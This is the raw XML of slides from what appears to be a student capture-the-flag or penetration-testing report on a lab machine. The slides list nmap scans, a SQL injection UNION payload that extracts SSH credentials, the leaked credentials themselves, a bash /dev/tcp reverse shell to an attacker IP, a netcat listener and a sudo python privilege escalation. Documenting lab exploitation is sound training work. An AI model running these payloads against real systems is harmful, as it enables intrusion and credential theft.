            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>We were able to access the system flag by reading a file that had weak or misconfigured permissions. After achieving root access through privilege escalation, the flag file could be read without any protection or access control, indicating that sensitive files were not properly secured.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Severity: Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" i="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS Score: 6.5 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t>cat root.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F978CBD-EF45-60C5-D949-4959CDD6A386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917315" y="3238501"/>
            <a:ext cx="4626610" cy="2512060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68939AD5-B2E1-0753-60CA-911A4E4222CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5186880" y="5750561"/>
            <a:ext cx="2372160" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" i="1"/>
              <a:t>Captured the flag.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357848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CE957-551F-B143-0083-AB505E397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F2678-CB5D-9064-FDED-B1B9B4C5EC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640773" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Tools and Commands Used in this Project:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59F8E12-19B3-641B-7E57-35459A4E74AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="11638722" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Reconnaissance &amp; Scanning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– for identifying live hosts on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– for comprehensive port scanning and service detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Example commands used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> -p- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> 192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> --version-all -O --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>-guess -A -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> --script vuln -T5 -p 21,22,80 192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Information Gathering:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>Ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – to check network interface details on the attacker machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Manual Git enumeration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Downloaded and analyzed a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>`.git/` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory manually using: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>git log </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracted credentials from git commit history by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>git show a4d900a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Exploitation Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Manual SQL Injection (SQLi) – exploited `id=' parameter using:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>'ORDER BY` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>`UNION SELECT` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2128678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F3995-9A8A-5FE3-CF24-804758FA6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62EEE-5FB8-5A14-07C1-034A5AE35EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640773" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0"/>
              <a:t>Cont..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DEF7AA8-6A92-D12C-AC23-F9E145FE7214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="11638722" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Enumeration of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Databases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>(`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>`)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>(`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>`)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Columns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>(`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>`)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracted credentials from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>`ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Example payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> id=' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Credential Reuse Attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SSH login using credentials found in SQLi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>    `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>SSH:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Used for direct remote login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SSH Port Forwarding to access internal services:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Local File Inspection (post-SSH):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– discovered internal services and credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`cat /opt/web/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– found remote code execution via `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>` parameter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104704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FCAF9-349F-C786-C465-0A52E1C88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CBF5BE-72BC-D10E-3CC2-05B52175EECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640773" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0"/>
              <a:t>Cont..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0D51E50-7011-CD25-97AF-3EC33054E677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="11638722" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>`):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Used to set up a reverse shell listener: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reverse Shell Payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Bash reverse shell executed via RCE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Privilege Escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Exploited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>rights with Python:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>     script -qc "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>(\"/bin/bash\")'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Flag Capture:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`cat root.txt` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– post-escalation flag access</a:t>
            </a:r>
          </a:p>
